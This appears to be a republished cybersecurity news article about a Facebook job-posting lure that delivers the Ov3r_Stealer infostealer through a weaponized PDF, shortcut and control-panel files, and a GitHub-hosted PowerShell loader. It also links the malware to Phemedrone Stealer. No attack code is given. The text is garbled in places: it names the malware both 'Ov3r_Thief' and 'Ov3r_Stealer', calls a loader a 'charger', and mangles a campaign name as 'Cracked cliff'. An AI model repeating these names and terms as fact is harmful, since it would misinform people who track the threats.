February 6, 2024Press RoomSocial Engineering / Malvertising
Threat actors are leveraging fake job postings on Facebook as a lure to trick potential targets into installing a new Windows-based stealer malware codenamed Ov3r_Thief.
“This malware is designed to steal credentials and crypto wallets and send them to a Telegram channel that the threat actor monitors,” Trustwave SpiderLabs saying in a report shared with The Hacker News.
Ov3r_Stealer is capable of extracting information based on IP addresses, hardware information, passwords, cookies, credit card information, autofills, browser extensions, cryptocurrency wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.
While the exact end goal of the campaign is unknown, it is likely that the stolen information will be offered for sale to other threat actors. Another possibility is that Ov3r_Stealer will be updated over time to act as a QakBot-like charger for additional payloads, including ransomware.
The starting point of the attack is a weaponized PDF file that pretends to be a file hosted on OneDrive, prompting users to click on an “Access Document” button embedded in it.
Trustwave said it identified the PDF file that was shared on a fake Facebook account impersonating Amazon CEO Andy Jassy, as well as through Facebook ads for digital advertising jobs.
Users who end up clicking the button are presented with an Internet shortcut (.URL) file that masquerades as a DocuSign document hosted on Discord’s content delivery network (CDN). The shortcut file then acts as a conduit to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary (“control.exe“).
Executing the CPL file leads to the retrieval of a PowerShell loader (“DATA1.txt”) from a GitHub repository to eventually launch Ov3r_Stealer.
It is worth noting at this stage that Trend Micro recently revealed that threat actors used a nearly identical infection chain to launch another stealer called Phemedrone Stealer by exploiting the Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025, CVSS score: 8.8).
The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r_Stealer shares code-level overlaps with Phemedrone.
“This malware has recently been reported and it is possible that Phemedrone has been repurposed and renamed Ov3r_Stealer,” Trustwave said. “The main difference between the two is that Phemedrone is written in C#.”
To further solidify the connections between the two malware stealers, the threat actor has been observed sharing news reports published about the Phemedrone stealer on its Telegram channels in an effort to generate “street cred” for its malware-as-a-service (MaaS) business.
“My custom stealer is on the news, showing how elusive it is, I’m its developer so I’m very happy now,” said the threat actor, who goes by the online alias Liu Kong, while expressing frustration that threat hunters managed to “reverse the entire exploit chain” despite everything being “in memory.”
The findings come as Hudson Rock revealed that threat actors are advertising their access to the law enforcement request portals of major organizations such as Binance, Google, Meta and TikTok exploiting credentials obtained from information-stealing infections.
They also follow the emergence of a category of infections called Cracked cliff that leverage pirated software as an initial access vector to download loaders such as PrivateLoader and SmokeLoader, which subsequently act as a delivery mechanism for information stealers, cryptocurrency miners, proxy botnets, and ransomware.
Did you find this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we publish.
JOBs Apply News
For the Latest JOBs Apply News, Follow ©JOBs Apply News on Twitter and Linkedin Page.